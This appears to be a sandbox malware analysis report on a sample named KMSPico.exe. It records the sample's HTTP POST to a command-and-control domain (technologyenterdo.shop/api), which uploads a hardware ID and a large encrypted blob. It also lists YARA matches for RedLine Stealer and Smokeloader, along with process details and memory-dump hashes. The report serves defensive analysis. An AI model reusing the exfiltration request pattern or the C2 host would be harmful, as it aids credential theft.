                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=aft6olj77m8001fl6bus80qes0; expires=Sun, 23-Jun-2024 18:34:39 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BKNVXg92ou38rtRSp8lrFw6eEFzFmzLSIGFWHhucK8RvAi%2BNTKytjZwPO13N%2FZv02CMQRVfjrGIIc0Ghi9cLhM2DSAUl08aRygXM0Gz2OlKHbGVcd%2BQOu1SEfEEGvc5yuR4iy9QK5C65"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce632cc2a435c-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:48:00 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 0d 0a
                                    Data Ascii: 11ok 191.96.227.215
                                    2024-02-29 00:48:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.549711104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:48:01 UTC289OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 591913
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 32 37 42 33 41 39 38 36 36 41 39 39 35 30 42 30 35 45 44 37 45 30 41 46 35 33 38 46 32 43 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 54 7a 70 32 63 71 2d 2d 4b 4d 53 0d 0a
                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"827B3A9866A9950B05ED7E0AF538F2C5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Tzp2cq--KMS
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: cc 6a 7f a1 c1 56 04 1b 8b 28 96 ec bf a0 03 46 7a cd 0d d6 9c 65 1d 32 f5 3d 50 ac af ed 32 97 00 c3 64 1f d8 18 f8 c5 18 3d 89 e2 a7 f9 fa 23 2e 6a a6 12 25 a1 ef 3b e6 26 3c 5a 13 35 f7 ea 7f 2b 33 4f 12 81 29 4f 08 99 df 2c 19 cc 8f db a2 20 af 0f a8 43 ad ca 33 9a 16 08 8a e2 af 6b 1e 55 62 39 2e 8e 36 79 11 7a 99 ac 6d 58 61 49 a0 12 11 f6 09 64 f8 ae f5 95 5c 03 8c 81 ea 04 c9 c3 b0 b6 c6 b7 28 79 56 2d 8a 70 78 c1 51 1e 7d f1 9d 63 ab 6c 6f ce 0c 7a 96 16 07 8d 7f 20 33 b8 bf 16 18 fb 99 6d df 13 0c 47 09 9d 6e c5 d0 57 e1 1c 4f 7b 41 e0 3b 96 ee e0 76 52 fd e4 09 36 ff 6b 1f 33 f8 68 b7 27 75 66 85 25 7a 76 78 a1 f2 a0 a0 dc bb 96 2f 00 05 e1 54 41 71 46 c2 59 c7 54 7c 8e 26 f4 5a b6 d9 12 98 f5 28 c2 c3 8e 33 7c 57 c5 85 2e 3f 3a 16 be 27 8a 3f
                                    Data Ascii: jV(Fze2=P2d=#.j%;&<Z5+3O)O, C3kUb9.6yzmXaId\(yV-pxQ}cloz 3mGnWO{A;vR6k3h'uf%zvx/TAqFYT|&Z(3|W.?:'?
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 6d 8c 3c 9d 4f 88 a7 fa e2 be 2b 66 92 2f 85 74 41 88 59 42 f0 00 90 e9 fe b0 99 fd 61 7b 64 38 11 94 e7 01 0b e7 6a 0d 9a b4 f7 72 5f 73 7e 54 10 51 e2 8d 73 47 9b 50 f1 4d c3 d2 ad c6 bf f4 65 c6 af 9e d7 46 66 a9 62 f5 eb dc f3 3b d5 d0 ff d1 ec fb ee d5 bc 25 14 20 89 dc 22 7f 23 5a f0 86 45 bb 44 08 49 f1 90 c3 29 99 1c 4d e0 51 1b 8d 08 70 ed fe d6 d7 9c 8f 14 0a 25 75 e8 dd 2e b2 86 ab ab e0 89 cb 1a 23 00 aa 61 ba cc 36 5a 9a b9 38 57 12 f1 1e 27 6f d9 0c f4 48 dd b6 b6 ce 99 7b 8b dd 81 a5 27 49 c2 16 72 68 91 9e 50 a4 cd 46 32 a1 99 ab df f5 69 8f c2 49 c4 31 91 da dc 99 63 46 64 a4 c5 50 a6 d7 8b f2 58 8f 00 7d d7 a1 6d ea b8 cd 5c fe f4 4a 7e 65 ea 4d eb ef 6d 35 6b 9c d9 b1 e4 5b 7e 47 07 7d 1e f0 7e cd 85 ce cd a6 06 d6 44 87 9d d4 c5 21 49
                                    Data Ascii: m<O+f/tAYBa{d8jr_s~TQsGPMeFfb;% "#ZEDI)MQp%u.#a6Z8W'oH{'IrhPF2iI1cFdPX}m\J~eMm5k[~G}~D!I
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 65 29 e1 8e 8d 54 bb 35 32 45 04 18 e3 c2 74 db e6 7f 4d 4f e4 d7 23 53 de be 33 e8 e1 8a 8c 6b b0 f1 4e d4 e5 59 da f7 ff dd 62 24 00 4a 04 fe dc 2e a0 05 7a 84 d9 f1 a6 74 0d 43 30 eb 7f 86 98 0d 34 51 3b 16 bb 81 97 18 d7 7b 3f cc 09 05 dc 6f fe b2 f8 e1 2a c0 b9 7e b7 28 3f c7 1c 62 d2 c3 12 27 40 5b 44 f5 55 40 6b d9 b1 2f a5 86 9b a8 44 47 88 0b 4e 6b cd 19 80 43 c0 54 19 b5 73 99 60 2b 17 81 3c 54 f4 58 2a 22 e0 35 ee d1 0b 2c 8c ae ac da 82 53 18 47 96 c0 40 e7 6f 4b 90 93 29 62 19 c0 f7 f7 77 90 99 3f 35 cb 0b 3d bc c5 24 13 6a 6c e7 51 bc dc f4 30 20 c0 f0 2e dd b2 11 f1 b7 52 2c 9b 25 54 e0 c3 21 04 6f 91 03 1b 4a 62 5e 08 d0 99 47 82 e4 94 aa 8f 80 1c 62 52 5b db 57 d8 09 93 a6 3b 4b 1b 73 e2 9d c4 97 71 85 d0 14 10 f4 b5 bd ba 7e 08 e3 75 61
                                    Data Ascii: e)T52EtMO#S3kNYb$J.ztC04Q;{?o*~(?b'@[DU@k/DGNkCTs`+<TX*"5,SG@oK)bw?5=$jlQ0 .R,%T!oJb^GbR[W;Ksq~ua
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 5a 86 d8 24 e1 36 61 51 62 1c b0 19 ad 2e 41 1c 77 a4 40 a2 52 ac f3 3c b1 a2 c7 c1 b5 42 08 b6 9d b2 15 ad e9 19 39 c9 00 26 b5 f6 d9 80 3a c5 b1 26 32 ff 56 18 de df cc d3 1b ea 26 f7 17 13 fd 38 e7 fc 31 7d e3 c4 84 a1 69 55 93 0a f9 5b c3 d1 03 41 59 8d bf 6c 83 30 8a f2 35 59 c8 bd fe b0 98 4b 91 c5 09 a5 4f cb d7 30 9b 1d bd a4 d4 50 73 51 d7 00 54 5f 29 8d 7b 41 7a a9 58 d8 08 66 88 a4 e8 5c f5 14 38 8e d9 29 42 44 09 9b 79 4b b6 7a f2 75 85 1e 5e 2d 5c 9b 70 ec ce 4a d8 e5 99 66 4f da 10 e5 f4 7a 68 84 2b f6 47 2a 96 23 3f 90 64 a2 d1 80 66 0d 1c 9e 15 7e b2 6d 32 01 aa 9c 9d 4b c8 b8 f4 88 e3 4f a3 c6 ee ed df 97 26 17 57 16 de d6 b6 63 99 de a3 99 7b 62 6f 9f ea c0 31 25 df ab 97 f6 1e d5 7a 72 8d 5b ac 46 9f 16 3e 47 62 1e 87 28 57 80 cf 0b 38
                                    Data Ascii: Z$6aQb.Aw@R<B9&:&2V&81}iU[AYl05YKO0PsQT_){AzXf\8)BDyKzu^-\pJfOzh+G*#?df~m2KO&Wc{bo1%zr[F>Gb(W8
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 9e b3 b8 09 5e 4f 57 4f 0c eb 1d 00 74 0e 6f e8 14 5d 91 48 4f e7 ae 2c f8 1b 89 2c 96 e6 6d 0c ab 08 2c 7d f6 de 9a 65 55 de 91 4f d8 23 06 9a a4 22 d4 7c a9 21 60 8b 48 26 d1 48 30 59 92 31 e3 2d 2e 63 fb e2 c6 b5 9a 5d 07 aa ef 9c 3a 86 57 4f d1 b7 01 f4 91 9b 8a d3 62 20 94 cb 1c 6e e9 74 ff c2 cd 7f 7b 09 fe 5a 1a c4 ec b9 9d 84 a6 dd 25 6f f7 fb db 83 cf 27 60 77 6c 9f 35 c6 b9 49 4a a1 d6 8f 54 57 29 01 9a df 29 53 04 12 4b 61 a4 be 62 57 e8 a9 f3 fe 02 20 88 0f c5 84 40 c5 5d 40 f9 42 f4 9c cc fe 36 2d 05 a4 be 82 99 7d ac 1f 11 f0 c7 98 02 0c 1f 94 bd 4b 0e 61 11 e1 46 22 93 d7 87 1c f6 2e bf e2 15 be 12 15 76 7c 69 f8 e2 85 c3 4c 0d ab 1d d7 ba 1e 82 b4 62 9c ab 44 4f 7d 84 b2 ef ca 53 63 da 3d 4a bd 83 2c 68 6a 12 28 2f 81 38 72 58 65 8b ad 9b
                                    Data Ascii: ^OWOto]HO,,m,}eUO#"|!`H&H0Y1-.c]:WOb nt{Z%o'`wl5IJTW))SKabW @]@B6-}KaF".v|iLbDO}Sc=J,hj(/8rXe
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: b5 89 79 7e 02 8b bd ce a9 86 77 20 22 47 f6 82 4c 8c 2a 4c e8 02 28 08 e2 03 fa 0f 80 8d e5 fc 93 db 39 10 65 d2 90 f6 e5 0e 34 14 89 86 75 f7 c7 02 53 52 e9 ca 59 5e c0 68 a0 c7 cb 1d 01 1b c9 33 19 d3 8f d8 5f ef 7a 6a 62 23 7d 70 fb f1 18 8c 82 7d 4f 42 50 0a 37 a5 bf 56 b6 1c fd d5 a3 89 fc fe 04 ab e5 67 45 d0 f9 3f 68 da c5 31 1a 92 42 93 1f 1f 01 3d 1a 44 9d 8b 20 5f 10 83 98 75 1b 18 98 7f fb 02 b6 3e 14 86 fc 6b 4e ba c6 ae db a8 b0 77 98 37 48 f9 d1 0c 3a 70 9e b5 d8 1e 5d 20 a8 0b f6 a9 43 e7 f0 27 cc 09 37 ec 60 39 6e 91 16 88 46 ed 22 dc 00 f9 6e e3 0e 2e 3c 69 be 3c 62 eb 51 03 11 f0 3d 3d 86 c5 15 aa fb 6c 77 e9 46 c7 52 66 1b 25 a4 aa 15 0a 58 da 3a 7d 2b 5a 8f 3b b9 51 f0 8d e8 c3 8f 9a af 5e 4a 94 16 df 8d df c9 42 2c d7 de e7 0b 97 45
                                    Data Ascii: y~w "GL*L(9e4uSRY^h3_zjb#}p}OBP7VgE?h1B=D _u>kNw7H:p] C'7`9nF"n.<i<bQ==lwFRf%X:}+Z;Q^JB,E
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: eb a1 65 85 76 67 c5 de a9 b2 ec 38 28 73 35 48 6a 7a ea b4 71 0d 09 c1 52 2e 07 15 61 35 74 ba 7c 02 39 01 24 08 93 69 e5 b3 ad 41 a7 7e 56 1d dc a1 40 57 9c 17 47 dd 3e 17 83 22 f1 6b a1 2e 49 d4 4c 58 79 a3 ad 93 01 d1 91 80 e0 6e 86 8e 06 be 3b 12 2e 26 bf 49 79 ce ce dc a5 3c 2d 88 61 a1 17 ad 1a 33 35 91 1f 34 21 c5 73 f4 11 6e 05 b7 8c db 9c 55 aa 88 76 8d ba ff ad 22 68 07 e6 8d 40 5b c3 e3 da 59 12 6c a4 ce 25 e2 ae bb c9 dc 31 0a d7 37 0b 85 56 89 39 9f 30 91 35 29 8e bc b3 9e 17 70 b6 08 ae 1c d2 a7 f4 45 04 52 75 74 f8 bd 7e 7a c7 89 64 02 e2 b0 a9 ad b4 4a 19 6a 46 a2 c3 eb 2c 71 30 e4 11 60 be 8e af 9b 25 85 1b 91 8f cd 3b 1e c4 29 44 fb 28 8a 8d f6 d6 db cb a3 8b 45 af 0e 7d c9 25 eb af b4 98 45 ae 55 84 9e 79 5d ca bf 82 9b 02 bf 27 fb 4c
                                    Data Ascii: evg8(s5HjzqR.a5t|9$iA~V@WG>"k.ILXyn;.&Iy<-a354!snUv"h@[Yl%17V905)pERut~zdJjF,q0`%;)D(E}%EUy]'L
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: f6 b4 de f1 1c a7 2f 43 19 3f 4f 1d aa b6 19 fb 0b e3 c7 8d af 6b bc e3 33 c1 7a 8b b9 1a 7b 67 7e 65 81 46 41 cf df 67 3f ed 7d 79 b3 12 bd e0 d0 b7 f9 ba 5f cf f5 e0 73 83 db ff de b9 24 97 36 78 88 bb 87 b8 f5 6f 91 2a f4 c7 04 de 14 61 ea 83 64 5d 02 d9 f2 1c f2 45 90 a7 ed f0 92 e5 73 84 75 45 d0 4d fb 25 a2 1e 1f e5 c6 4a c4 4a 82 8b fa 4e 34 3b 71 e6 eb 91 d6 52 ce 79 96 b7 f0 e0 d4 69 03 09 b2 4a 5f 72 a7 64 55 8a e6 53 57 95 6a 86 84 2f 33 4c e5 6b 60 70 f6 7c 00 0e db d9 30 46 9b 13 10 a0 aa 15 e1 65 d2 9c 43 1d 46 16 0b ff fa 75 5d f2 bf 43 f4 8a 0f 93 89 b1 66 29 8c 41 6b 03 a6 31 60 2c 18 32 7c 9e 4f ec 0c b3 10 02 0d fc 1c 1f 69 b0 16 64 a3 d1 a2 7c 81 e2 79 36 b2 07 4d b5 b7 82 18 f5 9d ff 65 e9 64 6a 4a 78 a3 22 e4 94 2a e5 da 0f 80 cf 8f
                                    Data Ascii: /C?Ok3z{g~eFAg?}y_s$6xo*ad]EsuEM%JJN4;qRyiJ_rdUSWj/3Lk`p|0FeCFu]Cf)Ak1`,2|Oid|y6MedjJx"*
                                    2024-02-29 00:48:01 UTC15331OUTData Raw: 5c f7 2b cd 9e 5b 93 36 e1 3a e8 ba ac 57 84 30 c3 40 d7 0c d3 dd 8a 85 25 32 81 17 7c f3 f3 95 67 75 1c 4d 19 1e 86 0d ff 25 b9 bf d2 28 ce 39 2a f5 10 9e cf ea 78 ad 2a 52 b2 31 83 e2 69 d9 7f 1d 2f f1 a1 66 0e 47 4a da 54 ea 00 7c e7 8e 8a 8e fc 67 15 a1 88 78 f4 92 46 79 fe f8 93 22 1c 8d 43 f6 53 1a cc 16 05 40 89 74 8f 5d 72 58 71 e9 c6 9a 92 ed 97 03 2e 49 fa 58 0b b7 76 b4 d2 3f f8 59 2d 76 5d e2 43 5b 4c 0a 6c c9 9a b3 57 0f 8c 74 30 be f4 fb ea cd 3d 39 f5 ab 6a 65 31 a9 7d 31 48 78 81 b9 90 b9 c7 3c 4f 42 b1 d2 52 84 56 61 25 ce 3b ab 3b 32 f7 f5 8d b4 73 a1 d5 56 b3 64 f9 72 72 a7 8f 99 ce af 16 bf 81 ec 85 c2 d5 2c ba 77 6c 27 c3 2a 35 fe 56 d0 d7 0f c1 eb 25 fb 6c 6d ba b7 56 9f 6d 24 86 cc fd 62 2c f1 0a 32 e5 4c c3 1d ee 8e 67 70 07 b2 3d
                                    Data Ascii: \+[6:W0@%2|guM%(9*x*R1i/fGJT|gxFy"CS@t]rXq.IXv?Y-v]C[LlWt0=9je1}1Hx<OBRVa%;;2sVdrr,wl'*5V%lmVm$b,2Lgp=
                                    2024-02-29 00:48:03 UTC810INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:48:03 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=4f30vjsafuiq3iqip44taj0bkd; expires=Sun, 23-Jun-2024 18:34:42 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Mi%2BR4IG5Y6z%2FUFiMLd6BDNtWMfLc3benP6TxfZxC%2Bq26D2kZ5hbrPwcT8RXzpCcoqVGa0tBX6%2FrJtNdot6e3vm%2B%2F9gALwvMqXUQCOEPAiDTcZd9vqjw4h7CFVJ0jIxA4M2Yhp1FkBUm4"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce63a3cb90ced-EWR
                                    alt-svc: h3=":443"; ma=86400


                                    050100s020406080100

                                    Click to jump to process

                                    050100s0.002040MB

                                    Click to jump to process

                                    • File
                                    • Registry

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:01:47:48
                                    Start date:29/02/2024
                                    Path:C:\Users\user\Desktop\KMSPico.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\KMSPico.exe
                                    Imagebase:0x400000
                                    File size:287'744 bytes
                                    MD5 hash:E46FCDE17771922059B7A826EC4E4CA3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:01:48:03
                                    Start date:29/02/2024
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644
                                    Imagebase:0xea0000
                                    File size:483'680 bytes
                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                    Non-executed Functions

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4507f270a2ee7dabfb465380396a5c221c8a3b694f4f23394a55b24be7c05c73
                                    • Instruction ID: 8d936e00bf124ba3a4402160f0f99ee23ab4cacd710cd64892e45eae027af7da
                                    • Opcode Fuzzy Hash: 4507f270a2ee7dabfb465380396a5c221c8a3b694f4f23394a55b24be7c05c73
                                    • Instruction Fuzzy Hash: 1CE165A645E7C19FE7139B7498652803FB4AE17224B0F46DBC0C1CF4F3E218590ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 15d704726d580b4dd7883564c2eb591c1b9004fcc4c7c31cb6fdcdd1d5ec80a2
                                    • Instruction ID: 99de8d58d2a8e1c85be8f15777443db1a134925b6494b2226670f4679cf3a0fe
                                    • Opcode Fuzzy Hash: 15d704726d580b4dd7883564c2eb591c1b9004fcc4c7c31cb6fdcdd1d5ec80a2
                                    • Instruction Fuzzy Hash: 56E164A645EBC19FE7139B7488656803FB0AE17224B5F46DBC0C1CF4F3E218590ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000000.00000003.2045323982.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, Offset: 04B0F000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_3_4b0f000_KMSPico.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c3d0e7c582979b76f6187cab7793e723a7934567e9e692c1b4fde7a82fc3e96
                                    • Instruction ID: fa7b742345bc77aa2c8c94a88b781d4cfbf87a59e0a0ad6f45556a13c4647a14
                                    • Opcode Fuzzy Hash: 4c3d0e7c582979b76f6187cab7793e723a7934567e9e692c1b4fde7a82fc3e96
                                    • Instruction Fuzzy Hash: 167153A645E7C15FE7139B748C616803FB0AE17224B4F46DBD091CF4F3E218A90ADB66
                                    Uniqueness

                                    Uniqueness Score: -1.00%